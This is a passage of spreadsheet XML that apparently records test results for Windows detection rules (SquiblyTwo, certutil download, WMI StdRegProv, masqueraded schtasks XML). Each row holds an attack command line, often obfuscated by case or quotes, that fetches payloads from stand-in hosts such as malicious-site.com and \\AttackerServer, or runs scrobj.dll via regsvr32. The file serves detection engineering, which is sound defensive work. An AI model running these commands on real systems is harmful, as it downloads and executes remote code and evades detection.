          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1078" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1078" s="36" t="inlineStr">
        <is>
          <t>certutil -urlcache -sPlIt -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1078" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1078" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1078" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1078" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1078" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1078" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1079" ht="15.75" customHeight="1" s="42">
      <c r="A1079" s="43" t="n"/>
      <c r="B1079" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1079" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1079" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1079" s="36" t="inlineStr">
        <is>
          <t>certutil -"urlcache" /"split" -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1079" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1079" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1079" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1079" s="43" t="n"/>
      <c r="J1079" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1079" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1080" ht="15.75" customHeight="1" s="42">
      <c r="A1080" s="43" t="n"/>
      <c r="B1080" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1080" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1080" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1080" s="36" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -spLit -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1080" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1080" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1080" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1080" s="43" t="n"/>
      <c r="J1080" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1080" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1081" ht="15.75" customHeight="1" s="42">
      <c r="A1081" s="43" t="n"/>
      <c r="B1081" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1081" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1081" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1081" s="36" t="inlineStr">
        <is>
          <t>certutil -"urlcache" -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1081" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1081" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1081" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1081" s="43" t="n"/>
      <c r="J1081" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1081" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1082" ht="15.75" customHeight="1" s="42">
      <c r="A1082" s="43" t="n"/>
      <c r="B1082" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1082" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1082" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1082" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1082" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1082" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1082" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1082" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1082" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1082" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1083" ht="15.75" customHeight="1" s="42">
      <c r="A1083" s="43" t="n"/>
      <c r="B1083" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1083" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1083" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1083" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /"format:"\\AttackerServer\share\evil.xsl""</t>
        </is>
      </c>
      <c r="F1083" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1083" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1083" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1083" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1083" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1083" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1084" ht="15.75" customHeight="1" s="42">
      <c r="A1084" s="43" t="n"/>
      <c r="B1084" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1084" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1084" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1084" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /foRmAt:"\\AtTAckErsErVeR\sharE\eVil.xSl"</t>
        </is>
      </c>
      <c r="F1084" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1084" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1084" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1084" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1084" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1084" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1085" ht="15.75" customHeight="1" s="42">
      <c r="A1085" s="43" t="n"/>
      <c r="B1085" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1085" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1085" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1085" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FOrmAT:"\\aTtaCKerserVEr\shaRe\EVil.XSl"</t>
        </is>
      </c>
      <c r="F1085" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1085" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1085" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1085" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1085" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1085" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1086" ht="15.75" customHeight="1" s="42">
      <c r="A1086" s="43" t="n"/>
      <c r="B1086" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1086" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1086" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1086" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FoRMAt:"\\ATTAcKeRSerVER\shaRE\eVIl.xSL"</t>
        </is>
      </c>
      <c r="F1086" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1086" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1086" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1086" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1086" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1086" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1087" ht="15.75" customHeight="1" s="42">
      <c r="A1087" s="43" t="n"/>
      <c r="B1087" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1087" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1087" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1087" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe -"node:127.0.0.1" process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1087" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1087" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1087" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1087" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1087" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1087" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1088" ht="15.75" customHeight="1" s="42">
      <c r="A1088" s="43" t="n"/>
      <c r="B1088" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1088" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1088" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1088" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NoDE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1088" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1088" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1088" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1088" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1088" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1088" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1089" ht="15.75" customHeight="1" s="42">
      <c r="A1089" s="43" t="n"/>
      <c r="B1089" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1089" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1089" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1089" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NOdE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1089" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1089" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1089" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1089" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1089" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1089" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1090" ht="15.75" customHeight="1" s="42">
      <c r="A1090" s="43" t="n"/>
      <c r="B1090" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1090" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1090" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1090" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1090" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1090" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1090" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1090" s="43" t="n"/>
      <c r="J1090" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1090" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1091" ht="15.75" customHeight="1" s="42">
      <c r="A1091" s="43" t="n"/>
      <c r="B1091" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1091" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1091" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1091" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1091" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1091" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1091" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1091" s="43" t="n"/>
      <c r="J1091" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1091" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1092" ht="15.75" customHeight="1" s="42">
      <c r="A1092" s="43" t="n"/>
      <c r="B1092" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1092" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1092" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1092" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1092" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1092" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1092" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1092" s="36" t="n"/>
      <c r="J1092" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1092" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1093" ht="15.75" customHeight="1" s="42">
      <c r="A1093" s="43" t="n"/>
      <c r="B1093" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1093" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1093" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1093" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1093" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1093" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1093" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1093" s="43" t="n"/>
      <c r="J1093" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1093" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1094" ht="15.75" customHeight="1" s="42">
      <c r="A1094" s="43" t="n"/>
      <c r="B1094" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1094" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1094" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1094" s="36" t="inlineStr">
        <is>
          <t>powershell -nop -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1094" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1094" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1094" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1094" s="43" t="n"/>
      <c r="J1094" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1094" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1095" ht="15.75" customHeight="1" s="42">
      <c r="A1095" s="43" t="n"/>
      <c r="B1095" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1095" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1095" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1095" s="36" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1095" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1095" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1095" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1095" s="43" t="n"/>
      <c r="J1095" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1095" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1096" ht="15.75" customHeight="1" s="42">
      <c r="A1096" s="43" t="n"/>
      <c r="B1096" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1096" s="36" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1096" s="36" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1096" s="36" t="inlineStr">
        <is>
          <t>powershell -Nop -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1096" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1096" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1096" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1096" s="43" t="n"/>
      <c r="J1096" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1096" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1097" ht="15.75" customHeight="1" s="42">
      <c r="A1097" s="43" t="n"/>
      <c r="B1097" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C1097" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D1097" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E1097" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy C:\Windows\System32\regsvr32.exe %TEMP%\updater.exe &amp;&amp; wmic process call create "%TEMP%\updater.exe /s /i:http://10.0.0.5/payload.sct scrobj.dll"</t>
        </is>
      </c>
      <c r="F1097" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1097" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1097" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1097" s="4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1097" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1097" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1098" ht="15.75" customHeight="1" s="42">
      <c r="A1098" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1098" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1098" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1098" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1098" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe -create -tn "SuspiciousTask2" -xml "C:\public\payload.bin" -f   # ignored_comment.xml</t>
        </is>
      </c>
      <c r="F1098" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1098" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1098" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1098" s="43" t="n"/>
      <c r="J1098" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1098" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1099" ht="15.75" customHeight="1" s="42">
      <c r="A1099" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1099" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1099" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1099" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1099" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /create /tn "MyScheduledTask.xml" /xml C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1099" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1099" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1099" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1099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099" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1099" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1100" ht="15.75" customHeight="1" s="42">
      <c r="A1100" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1100" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1100" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1100" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1100" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /TN "MyScheduledTask.xml" -"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1100" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1100" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1100" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1100" s="43" t="n"/>
      <c r="J1100" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1100" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1101" ht="15.75" customHeight="1" s="42">
      <c r="A1101" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1101" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1101" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1101" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1101" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /"tn" "MyScheduledTask.xml" /"xml" C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1101" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1101" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1101" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1101" s="36" t="n"/>
      <c r="J1101" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1101" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1102" ht="15.75" customHeight="1" s="42">
      <c r="A1102" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1102" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1102" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1102" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1102" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /"create" /"tn" "MyScheduledTask.xml" /xml C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1102" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1102" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1102" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1102" s="36" t="n"/>
      <c r="J1102" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1102" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1103" ht="15.75" customHeight="1" s="42">
      <c r="A1103" s="36" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B1103" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_schedule_via_masqueraded_xml_file</t>
        </is>
      </c>
      <c r="C1103" s="36" t="inlineStr">
        <is>
          <t>Suspicious Scheduled Task Creation via Masqueraded XML File</t>
        </is>
      </c>
      <c r="D1103" s="36" t="inlineStr">
        <is>
          <t>dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c</t>
        </is>
      </c>
      <c r="E1103" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /crEATe -"tn" "MyScheduledTask.xml" /xMl C:\Users\Public\hidden_payload.tmp</t>
        </is>
      </c>
      <c r="F1103" s="36" t="b">
        <v>1</v>
      </c>
